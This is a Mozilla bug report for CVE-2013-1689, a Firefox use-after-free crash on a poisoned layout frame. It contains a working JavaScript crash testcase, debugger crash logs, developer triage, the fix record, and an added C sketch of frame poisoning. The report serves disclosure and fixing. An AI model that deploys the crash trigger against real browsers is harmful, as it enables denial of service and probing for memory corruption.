Closed
Bug 817219
(CVE-2013-1689)
Opened 13 years ago
Closed 12 years ago
Crash @xul!nsDOMEvent::GetTargetFromFrame on poison value
Categories
(Core :: Layout, defect)
People
(Reporter: nils, Assigned: MatsPalmgren_bugz)
(4 keywords, Whiteboard: [fixed by bug 635852][adv-main22+])
Attachments
(2 files)
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20.0 Firefox/20.0
Build ID: 20121126030823
Steps to reproduce:
Description:
The attached testcase crashes the browser, which seems to be related to event handling with frames. Crashes on a poison value, which indicates a potentially exploitable behaviour.
Tested and Affected Versions:
Firefox 20.0a1 (trunk)
Firefox 17.0
Testcase:
crash.html:
<html>
<script src="crash.js"></script>
<script>
window.setTimeout("start();", 10);
</script>
<body>
</body>
</html>
crash.js:
function start() {
  // Reporter's setup: an <input> that will hold a nested checkbox and button,
  // plus an iframe whose document is used later as a second owner document.
  o3=document.createElement('input');
  tmp = o3.ownerDocument.createElement('iframe');
  document.body.appendChild(tmp);
  o4=tmp.contentDocument;
  // One-shot wrapper: the change handler runs callback_3 exactly once.
  cb_3=function() { var f = callback_3; callback_3 = null; return f(arguments); }
  o3.addEventListener('change', cb_3, false);
  o51=document.createElement('img');
  o94=document.createElement('input');
  o94.type='checkbox';
  o3.appendChild(o94);
  o192=document.createElement('input');
  o192.type='button';
  o94.appendChild(o192);
  // Synthetic click on the innermost button; handling it ends up running cb_3.
  o263=document.createEvent('MouseEvents');
  o263.initMouseEvent('click', true, true, window,0, 0, 0, 0, 0, false, false, false, false, 0, null);
  o192.dispatchEvent(o263);
}
function callback_3() {
  // Watch for the button being removed, then reparent it under the detached <img>.
  o192.addEventListener('DOMNodeRemoved', callback_21, true);
  o51.appendChild(o192);
}
function callback_21() {
  // Mutation listener, still inside the change dispatch: move the button into the
  // iframe's document and reload (the beforeunload frames in the trace come from here).
  o4.documentElement.appendChild(o192);
  location.reload();
}
When trying to include the JavaScript code inline in the HTML it doesn't seem to crash on Windows. Both files are attached.
Crash log on Linux:
Program received signal SIGSEGV, Segmentation fault.
0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so
(gdb) info reg
eax 0x0 0
ecx 0xffffff80 -128
edx 0xf35017ff -212854785
ebx 0xf767adf8 -144200200
esp 0xfff7f150 0xfff7f150
ebp 0xfff7f168 0xfff7f168
esi 0xe17de3fc -511843332
edi 0xe775be68 -411713944
eip 0xf68ba5a4 0xf68ba5a4 <nsWeakFrame::InitInternal(nsIFrame*)+52>
eflags 0x210282 [ SF IF RF ID ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) x/3i $eip
=> 0xf68ba5a4 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+52>: mov 0x1c(%edx),%eax
0xf68ba5a7 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+55>: mov (%eax),%edi
0xf68ba5a9 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+57>: mov 0xc(%edi),%eax
(gdb) bt 20
#0 0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so
#1 0xf6a07017 in nsEventStateManager::GetEventTarget() () from /home/fred/debugging/firefox/libxul.so
#2 0xf6a0d830 in nsDOMEvent::GetTargetFromFrame() () from /home/fred/debugging/firefox/libxul.so
#3 0xf6a0d8da in nsDOMEvent::InitPresContextData(nsPresContext*) () from /home/fred/debugging/firefox/libxul.so
#4 0xf6a1595c in nsDOMBeforeUnloadEvent::nsDOMBeforeUnloadEvent(nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so
#5 0xf6a159e2 in NS_NewDOMBeforeUnloadEvent(nsIDOMEvent**, nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so
#6 0xf69a1c5e in nsDocument::CreateEvent(nsAString_internal const&, nsIDOMEvent**) () from /home/fred/debugging/firefox/libxul.so
#7 0xf686f0b2 in nsDocumentViewer::PermitUnload(bool, bool*) () from /home/fred/debugging/firefox/libxul.so
#8 0xf6d337da in nsDocShell::InternalLoad(nsIURI*, nsIURI*, nsISupports*, unsigned int, unsigned short const*, char const*, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsIDocShell**, nsIRequest**) () from /home/fred/debugging/firefox/libxul.so
#9 0xf5f8377f in nsDocShell::LoadHistoryEntry(nsISHEntry*, unsigned int) () from /home/fred/debugging/firefox/libxul.so
#10 0xf6d27b2b in nsDocShell::Reload(unsigned int) () from /home/fred/debugging/firefox/libxul.so
#11 0xf5d90fea in nsLocation::Reload(bool) () from /home/fred/debugging/firefox/libxul.so
#12 0xf6eda590 in NS_InvokeByIndex_P () from /home/fred/debugging/firefox/libxul.so
#13 0xf6cecc6a in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) () from /home/fred/debugging/firefox/libxul.so
#14 0xf6cf37ac in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) () from /home/fred/debugging/firefox/libxul.so
#15 0xf709f156 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) () from /home/fred/debugging/firefox/libxul.so
#16 0xf709321a in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) () from /home/fred/debugging/firefox/libxul.so
#17 0xf7153545 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) () from /home/fred/debugging/firefox/libxul.so
#18 0xf7153649 in js::mjit::JaegerShot(JSContext*, bool) () from /home/fred/debugging/firefox/libxul.so
#19 0xf709ea30 in js::RunScript(JSContext*, JS::Handle<JSScript*>, js::StackFrame*) () from /home/fred/debugging/firefox/libxul.so
Crash log on Windows:
xul!nsDOMEvent::GetTargetFromFrame+0x137d3e
xul!nsDOMEvent::nsDOMEvent+0xbc
xul!NS_NewDOMBeforeUnloadEvent+0x1d
xul!nsEventDispatcher::CreateEvent+0x36f
xul!nsHTMLDocument::CreateEvent+0x38
xul!DocumentViewerImpl::PermitUnload+0xbb
xul!nsDocShell::InternalLoad+0x5f8
xul!nsDocShell::LoadHistoryEntry+0x256
xul!nsDocShell::Reload+0xd6
xul!nsLocation::Reload+0x39
xul!NS_InvokeByIndex_P+0x27
xul!XPCWrappedNative::CallMethod+0x319
xul!XPC_WN_CallMethod+0xaa
mozjs!js::InvokeKernel+0x59
mozjs!js::Interpret+0x6ce4
mozjs!js::RunScript+0x415
mozjs!js::InvokeKernel+0x250
mozjs!js::Invoke+0x128
mozjs!JS_CallFunctionValue+0x41
xul!nsXPCWrappedJSClass::CallMethod+0x488
xul!nsDOMEvent::GetTargetFromFrame+0x137d3e:
6ff5b80e 8b511c mov edx,dword ptr [ecx+1Ch] ds:002b:f0de801b=????????
reported by nils of vulndev ltd.
Updated•13 years ago
Component: DOM: Events → Layout
Comment 1•12 years ago
Comment 2•12 years ago
bp-391d1522-1a30-40b0-9435-e988b2121208
Confirming the crash on a poisoned frame. So far no one has found a bypass for the poisoning mitigation so exploitability seems unlikely.
Status: UNCONFIRMED → NEW
status-firefox17:
--- → wontfix
status-firefox18:
--- → affected
status-firefox19:
--- → affected
status-firefox20:
--- → affected
Ever confirmed: true
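The crash lands on a poison value, and Comment 2 treats frame poisoning as the mitigation that makes it unlikely to be exploitable. The following added example (not code from this bug or from Gecko) sketches that idea in C: a toy frame arena with a constructed POISON_BYTE that never hands frame memory back to the general heap and fills freed slots so a dangling frame pointer reads an odd, unmappable address instead of attacker-placed data. The Frame struct, the arena and the poison byte are all constructed for illustration.

```c
#include <stdint.h>
#include <string.h>
/* Constructed poison byte (not Gecko's real poison value). Repeated across a
 * word it forms an odd address, never a valid aligned frame pointer, so a
 * dereference faults deterministically instead of reading useful data. */
#define POISON_BYTE 0xe5

/* Minimal stand-in for a layout frame: a parent link plus some payload. */
typedef struct Frame {
    struct Frame *parent;
    uintptr_t payload[3];
} Frame;

/* Toy frame arena: one size class, memory never goes back to the heap.
 * Freed slots are poisoned and recycled only as Frames, so a dangling
 * pointer observes poison rather than attacker-shaped heap data. */
enum { ARENA_SLOTS = 8 };
static Frame g_slots[ARENA_SLOTS];
static Frame *g_free_list[ARENA_SLOTS];
static size_t g_free_count, g_next_fresh;

uintptr_t poison_word(void) {         /* what a stale read returns */
    uintptr_t w;
    memset(&w, POISON_BYTE, sizeof w);
    return w;
}
Frame *arena_alloc_frame(void) {
    Frame *f = NULL;
    if (g_free_count > 0)
        f = g_free_list[--g_free_count];
    else if (g_next_fresh < ARENA_SLOTS)
        f = &g_slots[g_next_fresh++];
    if (f) memset(f, 0, sizeof *f);
    return f;
}
void arena_free_frame(Frame *f) {
    memset(f, POISON_BYTE, sizeof *f);  /* overwrite every byte */
    g_free_list[g_free_count++] = f;    /* slot stays inside the arena */
}

/* Mirrors the report's crash shape without faulting: a frame pointer that
 * outlived its frame is read, and the parent link comes back as the poison
 * word, the kind of value the gdb register dump shows being dereferenced. */
uintptr_t stale_parent_read(void) {
    Frame *root = arena_alloc_frame();
    Frame *child = arena_alloc_frame();
    child->parent = root;
    Frame *dangling = child;             /* e.g. a weak ref never cleared */
    arena_free_frame(child);
    return (uintptr_t)dangling->parent;  /* poison, not root */
}
```

In the real crash the poison word in edx is then used as a base for `mov 0x1c(%edx),%eax`, which is exactly the deterministic fault the mitigation aims for.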
Comment 3•12 years ago
The latest patch in bug 635852 fixes this.
Assignee: nobody → matspal
Depends on: 635852
Updated•12 years ago
Severity: normal → critical
Status: NEW → RESOLVED
Closed: 12 years ago
status-firefox21:
--- → affected
Flags: in-testsuite?
Resolution: --- → FIXED
Whiteboard: [fixed by bug 635852]
Target Milestone: --- → mozilla22
Updated•12 years ago
Whiteboard: [fixed by bug 635852] → [fixed by bug 635852][adv-main22+]
Updated•12 years ago
Alias: CVE-2013-1689
Comment 4•11 years ago
Group: core-security
Flags: in-testsuite? → in-testsuite+